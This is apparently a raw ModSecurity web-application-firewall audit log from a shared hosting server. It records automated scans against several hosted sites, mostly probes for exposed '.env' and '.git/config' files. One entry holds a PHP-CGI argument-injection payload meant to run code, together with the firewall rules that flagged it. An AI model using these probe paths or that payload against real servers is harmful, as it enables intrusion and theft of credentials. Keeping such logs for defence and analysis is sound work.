"/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "globalhealthgate.net"] [uri "/.env"] [unique_id "aIGn-EdutIOpb_kg22ircAAAAAk"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Warning: PHP Request Startup: open_basedir restriction in effect. File(/opt/alt/php82/var/lib/php/session) is not within the allowed path(s): (/var/www/vhosts/globalhealthgate.net/:/tmp/) in Unknown on line 0' Apache-Handler: proxy:unix:/var/www/vhosts/system/globalhealthgate.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753327608007465 346755 (- - -) Stopwatch2: 1753327608007465 346755; combined=2215, p1=447, p2=1636, p3=0, p4=0, p5=132, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --82dc1530-Z-- --591f3d3b-A-- [24/Jul/2025:06:26:49.136270 +0300] aIGn-FooLYw4or2LgWL1_gAAANc 195.178.110.161 60410 127.0.0.1 7081 --591f3d3b-B-- GET /.env.save HTTP/1.0 Host: globalhealthgate.net X-Real-IP: 195.178.110.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --591f3d3b-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.3.23 Cache-Control: private, must-revalidate pragma: no-cache expires: -1 Set-Cookie: XSRF-TOKEN=eyJpdiI6IlozUEdsYjJXOGlJRW9SWFNTWVI0WXc9PSIsInZhbHVlIjoiODg4RTUrRzBLcVpQaERjN1hjQk4zRTA1WjdFbGlSYWtDZ2FzbVo3b2ZQUkRTM0hLZGVoVFZMVXFmZEJhNHZUdUVjQ21RMmhPb2xBd2NQRVpuWFNTbTA3REdNMDJwRjZteUQ1S3F2M1NEc3VOR1UxUkF1aEVreFpSZG1RVUFHVjYiLCJtYWMiOiI4NjlhNDAyNDc4YzQyNmY5ZWI1NjJhNGUzMGI5ZmFhN2NlNWY1Zjc3ZTg5ZThkN2NmMDY1YjA0ZDdiMzYwYzU3IiwidGFnIjoiIn0%3D; expires=Thu, 24 Jul 2025 05:26:49 GMT; Max-Age=7200; path=/; secure; samesite=lax Set-Cookie: ghgverozonesolutions_session=nz529bObJY8JVwb06xCtuJuXM0i1ukEKh4raLc3Y; expires=Thu, 24 Jul 2025 05:26:49 GMT; Max-Age=7200; path=/; httponly; samesite=lax Upgrade: h2,h2c Connection: Upgrade, close Location: https://globalhealthgate.net Content-Type: text/html; charset=utf-8 --591f3d3b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "globalhealthgate.net"] [uri "/.env.save"] [unique_id "aIGn-FooLYw4or2LgWL1_gAAANc"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Warning: PHP Request Startup: open_basedir restriction in effect. File(/opt/alt/php82/var/lib/php/session) is not within the allowed path(s): (/var/www/vhosts/globalhealthgate.net/:/tmp/) in Unknown on line 0' Apache-Handler: proxy:unix:/var/www/vhosts/system/globalhealthgate.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753327608802283 334106 (- - -) Stopwatch2: 1753327608802283 334106; combined=2771, p1=638, p2=2001, p3=0, p4=0, p5=132, sr=162, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --591f3d3b-Z-- --1311cf06-A-- [24/Jul/2025:06:26:49.918597 +0300] aIGn-VooLYw4or2LgWL2CAAAAM8 195.178.110.161 60542 127.0.0.1 7081 --1311cf06-B-- GET /.env.prod HTTP/1.0 Host: globalhealthgate.net X-Real-IP: 195.178.110.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --1311cf06-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.3.23 Cache-Control: private, must-revalidate pragma: no-cache expires: -1 Set-Cookie: XSRF-TOKEN=eyJpdiI6IlpqQjVMdndSbDZTOEF5U2dQUlFIaEE9PSIsInZhbHVlIjoiRWQ0NW5ydEVBRUI0SjYvRWxGamkwdVRBTmhYVjVBNXlvTnpHNG5MRDYwelZVbGN4QUdEWVgyRzJIZExCeG5BRGQ3bS9SQm1OUmk0RnZZUzJTMVduOXphN3oySjBXN3IvMkFveVh4MHd5eUF6Q2diL0dFbTFZMHZNV0FFZTYzbzkiLCJtYWMiOiI3ODUzMDg4OTM2NDZlMDgxZmQ2OGUyYjBkOGJkYjY5ZTk4NTY3YjQ4NTgzOWNjMmZjYWZlOWE0ZmJhOWY2YTdhIiwidGFnIjoiIn0%3D; expires=Thu, 24 Jul 2025 05:26:49 GMT; Max-Age=7200; path=/; secure; samesite=lax Set-Cookie: ghgverozonesolutions_session=LTkjJ7eTVrly34pk1RdPE436xV1kgcS3MiCoHr1S; expires=Thu, 24 Jul 2025 05:26:49 GMT; Max-Age=7200; path=/; httponly; samesite=lax Upgrade: h2,h2c Connection: Upgrade, close Location: https://globalhealthgate.net Content-Type: text/html; charset=utf-8 --1311cf06-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "globalhealthgate.net"] [uri "/.env.prod"] [unique_id "aIGn-VooLYw4or2LgWL2CAAAAM8"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Warning: PHP Request Startup: open_basedir restriction in effect. File(/opt/alt/php82/var/lib/php/session) is not within the allowed path(s): (/var/www/vhosts/globalhealthgate.net/:/tmp/) in Unknown on line 0' Apache-Handler: proxy:unix:/var/www/vhosts/system/globalhealthgate.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753327609560326 358466 (- - -) Stopwatch2: 1753327609560326 358466; combined=2801, p1=519, p2=2150, p3=0, p4=0, p5=131, sr=188, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1311cf06-Z-- --23e19363-A-- [24/Jul/2025:06:26:50.668412 +0300] aIGn-looLYw4or2LgWL2EAAAAMA 195.178.110.161 60664 127.0.0.1 7081 --23e19363-B-- GET /api/.env HTTP/1.0 Host: globalhealthgate.net X-Real-IP: 195.178.110.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --23e19363-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.3.23 Cache-Control: private, must-revalidate pragma: no-cache expires: -1 Access-Control-Allow-Origin: * Set-Cookie: XSRF-TOKEN=eyJpdiI6IlVRNHpkb1hQdUg5dHJvZUdCMnNpbFE9PSIsInZhbHVlIjoiTktHQms2aHZQMjUyMmhwL2hHU1hDdWZrcFpEMzFQNXdMSzExeUVHTVZwMDlVM2Y5RlV5dldReGk2WnFPQ0RuMEhLSHo0OEhKMW9yemRlLzQrNlAwYnAwd2ZNTkR0SVh0VG9nb0lrZHJmd0NIdlVhNHJYQ21EU3MyeUQ4UGp6b1AiLCJtYWMiOiIxNmZmOTIwZWUwYzMyZGMxODY0ODkwOGZhOGYxYTc1MzhiMjQ5MjBiZjdiMzZmZTQ5ZTdkMmU4NzliMDUzNzk3IiwidGFnIjoiIn0%3D; expires=Thu, 24 Jul 2025 05:26:50 GMT; Max-Age=7200; path=/; secure; samesite=lax Set-Cookie: ghgverozonesolutions_session=2nZpfFIbvzWEDX42YHHGvqRf20yDcXOz0q66Hjtn; expires=Thu, 24 Jul 2025 05:26:50 GMT; Max-Age=7200; path=/; httponly; samesite=lax Upgrade: h2,h2c Connection: Upgrade, close Location: https://globalhealthgate.net Content-Type: text/html; charset=utf-8 --23e19363-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "globalhealthgate.net"] [uri "/api/.env"] [unique_id "aIGn-looLYw4or2LgWL2EAAAAMA"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Warning: PHP Request Startup: open_basedir restriction in effect. File(/opt/alt/php82/var/lib/php/session) is not within the allowed path(s): (/var/www/vhosts/globalhealthgate.net/:/tmp/) in Unknown on line 0' Apache-Handler: proxy:unix:/var/www/vhosts/system/globalhealthgate.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753327610317048 351483 (- - -) Stopwatch2: 1753327610317048 351483; combined=2516, p1=622, p2=1783, p3=0, p4=0, p5=111, sr=174, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --23e19363-Z-- --daaa2350-A-- [24/Jul/2025:06:26:51.383300 +0300] aIGn-1ooLYw4or2LgWL2GQAAAMQ 195.178.110.161 60768 127.0.0.1 7081 --daaa2350-B-- GET /dev/.env HTTP/1.0 Host: globalhealthgate.net X-Real-IP: 195.178.110.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --daaa2350-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.3.23 Cache-Control: private, must-revalidate pragma: no-cache expires: -1 Set-Cookie: XSRF-TOKEN=eyJpdiI6ImNZZUJuMmk0SHlucHlDL0svaC9JWmc9PSIsInZhbHVlIjoiQTluTCtlbEoyUnVuK3N3Qm9WcGFnNTFwVzNhdjI4OEtqdXgvNVdXVjNHZC9oTWlHeFRKRWdPNUFJbVB2OUNScCtTTE04Z21sNUVPUU5lZG9rUkZIbG12S2dXOEpvSXpNRjhXeWdFWFZER3RXcW5aRncwa1hiRTZVN0U0a0dBQnQiLCJtYWMiOiIwYTVkYWEyNWI4NjA5NWQ5Mzg2ZjdkMmRlZGE2MWNjYmM1YzFiNjFmYTBiNTc5OGQzZmQyZTNlNmI5OWMzMGQ5IiwidGFnIjoiIn0%3D; expires=Thu, 24 Jul 2025 05:26:51 GMT; Max-Age=7200; path=/; secure; samesite=lax Set-Cookie: ghgverozonesolutions_session=CHhmUSmZhHOpaFDT2sPrvhHZM2GiyCbegwMfQf7n; expires=Thu, 24 Jul 2025 05:26:51 GMT; Max-Age=7200; path=/; httponly; samesite=lax Upgrade: h2,h2c Connection: Upgrade, close Location: https://globalhealthgate.net Content-Type: text/html; charset=utf-8 --daaa2350-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "globalhealthgate.net"] [uri "/dev/.env"] [unique_id "aIGn-1ooLYw4or2LgWL2GQAAAMQ"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Warning: PHP Request Startup: open_basedir restriction in effect. File(/opt/alt/php82/var/lib/php/session) is not within the allowed path(s): (/var/www/vhosts/globalhealthgate.net/:/tmp/) in Unknown on line 0' Apache-Handler: proxy:unix:/var/www/vhosts/system/globalhealthgate.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753327611063307 320105 (- - -) Stopwatch2: 1753327611063307 320105; combined=4151, p1=786, p2=3256, p3=0, p4=0, p5=109, sr=178, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --daaa2350-Z-- --8b0ece76-A-- [24/Jul/2025:06:40:32.652796 +0300] aIGrMFooLYw4or2LgWITCwAAANQ 167.99.182.39 55020 127.0.0.1 7081 --8b0ece76-B-- GET /.env HTTP/1.0 Host: posrest.raqmix.cloud X-Real-IP: 167.99.182.39 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --8b0ece76-F-- HTTP/1.1 200 OK Upgrade: h2,h2c Connection: Upgrade, close X-Accel-Version: 0.01 Last-Modified: Mon, 23 Jun 2025 03:26:34 GMT ETag: "245-63834c76447d1" Accept-Ranges: bytes Content-Length: 581 --8b0ece76-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "posrest.raqmix.cloud"] [uri "/.env"] [unique_id "aIGrMFooLYw4or2LgWITCwAAANQ"] Stopwatch: 1753328432646606 6303 (- - -) Stopwatch2: 1753328432646606 6303; combined=3762, p1=738, p2=2773, p3=88, p4=57, p5=106, sr=232, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8b0ece76-Z-- --9092c073-A-- [24/Jul/2025:06:40:33.120853 +0300] aIGrMVooLYw4or2LgWITDgAAANc 167.99.182.39 52338 127.0.0.1 7081 --9092c073-B-- GET /.git/config HTTP/1.0 Host: posrest.raqmix.cloud X-Real-IP: 167.99.182.39 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --9092c073-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 29 Dec 2024 15:42:45 GMT ETag: "328-62a6a8c186eb7" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --9092c073-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "posrest.raqmix.cloud"] [uri "/.git/config"] [unique_id "aIGrMVooLYw4or2LgWITDgAAANc"] Stopwatch: 1753328433115913 5005 (- - -) Stopwatch2: 1753328433115913 5005; combined=2484, p1=607, p2=1810, p3=0, p4=0, p5=67, sr=141, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9092c073-Z-- --45679d72-A-- [24/Jul/2025:06:42:28.330474 +0300] aIGrpFooLYw4or2LgWIXIAAAANQ 105.159.243.22 58342 127.0.0.1 7081 --45679d72-B-- GET /.env HTTP/1.0 Host: haddadjewellery.com X-Real-IP: 105.159.243.22 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept-Encoding: gzip, deflate Accept: */* --45679d72-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 21 Jan 2025 14:39:31 GMT ETag: "328-62c38584f0049" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --45679d72-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "haddadjewellery.com"] [uri "/.env"] [unique_id "aIGrpFooLYw4or2LgWIXIAAAANQ"] Stopwatch: 1753328548326368 4208 (- - -) Stopwatch2: 1753328548326368 4208; combined=2352, p1=533, p2=1752, p3=0, p4=0, p5=67, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --45679d72-Z-- --d136f27a-A-- [24/Jul/2025:06:42:56.596818 +0300] aIGrwFooLYw4or2LgWIYSgAAAMo 176.9.104.232 37140 127.0.0.1 7081 --d136f27a-B-- GET /.env HTTP/1.0 Host: vivacetrading.com X-Real-IP: 176.9.104.232 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate, zstd Accept: */* Server: nginx Date: Thu, 24 Jul 2025 03:42:56 GMT Vary: Accept-Encoding Content-Encoding: gzip X-Powered-By: PleskLin --d136f27a-F-- HTTP/1.1 200 OK Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 586 Content-Type: text/html; charset=UTF-8 --d136f27a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "vivacetrading.com"] [uri "/.env"] [unique_id "aIGrwFooLYw4or2LgWIYSgAAAMo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/vivacetrading.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753328576577223 19714 (- - -) Stopwatch2: 1753328576577223 19714; combined=2442, p1=580, p2=1766, p3=0, p4=0, p5=95, sr=181, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d136f27a-Z-- --ec56f448-A-- [24/Jul/2025:06:42:59.108880 +0300] aIGrw1ooLYw4or2LgWIYUAAAANE 213.209.143.116 37228 127.0.0.1 7081 --ec56f448-B-- GET /.env HTTP/1.0 Host: sys.ellaith.com X-Real-IP: 213.209.143.116 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 accept-encoding: gzip --ec56f448-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Set-Cookie: csrf_cookie_name=8691024a1d664716ee1c70e22327c5d9; expires=Thu, 24 Jul 2025 04:43:59 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --ec56f448-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "sys.ellaith.com"] [uri "/.env"] [unique_id "aIGrw1ooLYw4or2LgWIYUAAAANE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sys.ellaith.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753328579028320 80634 (- - -) Stopwatch2: 1753328579028320 80634; combined=2746, p1=540, p2=1687, p3=0, p4=0, p5=519, sr=150, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ec56f448-Z-- --9879d264-A-- [24/Jul/2025:06:56:02.074206 +0300] aIGu0VooLYw4or2LgWIzFAAAAMU 167.99.210.137 45024 127.0.0.1 7081 --9879d264-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D""+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: crm.hamomohsen.net X-Real-IP: 167.99.210.137 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 164 User-Agent: Go-http-client/1.1 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip --9879d264-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.0.30 Cache-Control: no-cache, private Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --9879d264-H-- Message: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/etc/apache2/modsecurity.d/rules/comodo_free/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||crm.hamomohsen.net|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\\\\xadd cgi.force_redirect=0 \\\\xadd disable_functions="" \\\\xadd allow_url_include=1 \\\\xadd auto_prepend_file=php://input. [file "/etc/apache2/modsecurity.d/rules/comodo_free/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||crm.hamomohsen.net|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\\\\x5cxadd cgi.force_redirect=0 \\\\x5cxadd disable_functions=\\\\x22\\\\x22 \\\\x5cxadd allow_url_include=1 \\\\x5cxadd auto_prepend_file=php://input: \\\\xadd cgi.force_redirect=0 \\\\xadd disable_functions=\\\\x22\\\\x22 \\\\xadd allow_url_include=1 \\\\xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] [hostname "crm.hamomohsen.net"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aIGu0VooLYw4or2LgWIzFAAAAMU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/crm.hamomohsen.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753329361933906 140388 (- - -) Stopwatch2: 1753329361933906 140388; combined=6821, p1=526, p2=6135, p3=0, p4=0, p5=160, sr=141, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9879d264-Z-- --0c56bb01-A-- [24/Jul/2025:06:56:05.657433 +0300] aIGu1UdutIOpb_kg22jJNgAAAAM 167.99.210.137 50228 127.0.0.1 7081 --0c56bb01-B-- GET /.env HTTP/1.0 Host: crm.hamomohsen.net X-Real-IP: 167.99.210.137 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --0c56bb01-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.0.30 Cache-Control: no-cache, private Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --0c56bb01-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "crm.hamomohsen.net"] [uri "/.env"] [unique_id "aIGu1UdutIOpb_kg22jJNgAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/crm.hamomohsen.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753329365533473 124063 (- - -) Stopwatch2: 1753329365533473 124063; combined=2252, p1=480, p2=1645, p3=0, p4=0, p5=127, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0c56bb01-Z-- --198d3d7e-A-- [24/Jul/2025:06:56:06.001224 +0300] aIGu1UdutIOpb_kg22jJNwAAAAs 167.99.210.137 50270 127.0.0.1 7081 --198d3d7e-B-- GET /.git/config HTTP/1.0 Host: crm.hamomohsen.net X-Real-IP: 167.99.210.137 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --198d3d7e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.0.30 Cache-Control: no-cache, private Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --198d3d7e-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "crm.hamomohsen.net"] [uri "/.git/config"] [unique_id "aIGu1UdutIOpb_kg22jJNwAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/crm.hamomohsen.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753329365863669 137621 (- - -) Stopwatch2: 1753329365863669 137621; combined=2328, p1=469, p2=1752, p3=0, p4=0, 